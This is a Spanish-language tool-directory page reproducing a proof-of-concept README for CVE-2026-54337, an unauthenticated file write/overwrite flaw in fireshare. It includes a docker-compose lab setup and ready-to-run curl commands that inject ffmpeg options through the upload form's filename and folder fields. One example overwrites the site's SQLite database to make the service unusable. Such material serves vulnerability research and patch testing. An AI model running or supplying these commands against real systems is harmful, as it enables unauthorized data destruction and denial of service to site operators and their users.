Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-54337-PoC — CVE-2026-54337 - PoC de Escritura/Sobrescritura de archivos sin autenticación para fireshare <= 1.16.3 | Kitploit
Herramientas/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - PoC de Escritura/Sobrescritura de archivos sin autenticación para fireshare <= 1.16.3

Ver Repositorio
2hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-54337 PoC

CVE-2026-54337 - Escritura/Sobrescritura de archivos no autenticada en fireshare <= 1.16.3 PoC

Para más información, consulte este aviso de GitHub

Configuración

  • Utilice el siguiente docker-compose.yml para probar
root@kitploit:~
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Almacenamiento efímero (se descarta cuando el contenedor se detiene)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

Exploit

  • Paso 1: Cree cualquier archivo siempre que lo nombre con la extensión .mp4, por ejemplo
root@kitploit:~
$ echo 123 > test.mp4
  • Paso 2: Ejecute el siguiente comando curl (asegúrese de cambiar el marcador de posición)
root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

Por ejemplo, para sobrescribir /data/db.sqlite cambiará el comando de la siguiente manera

root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

Nota

  • Dado que por defecto, el servicio se ejecuta bajo el usuario nginx, que solo tiene acceso a /data, /processed, /images y /videos, por lo tanto solo puede escribir/sobrescribir allí
  • Debido a eso, en mi opinión, sobrescribir /data/db.sqlite tiene el mayor impacto ya que hará que el sitio web sea inutilizable

Descargo de responsabilidad

  • Esta prueba de concepto (PoC) se proporciona únicamente con fines educativos, de investigación y de seguridad defensiva.
  • El autor no es responsable de ningún uso indebido, daño, acceso no autorizado, interrupción del servicio, pérdida de datos o consecuencias legales derivadas del uso de este código. Los usuarios son los únicos responsables de asegurarse de cumplir con todas las leyes, regulaciones y requisitos de autorización aplicables antes de utilizar esta PoC.
  • Esta PoC solo debe ejecutarse contra sistemas para los cuales tenga permiso explícito para realizar pruebas. Las pruebas no autorizadas de sistemas pueden ser ilegales y poco éticas.
  • Al usar este software, usted reconoce que lo hace bajo su propio riesgo.
Descargar herramienta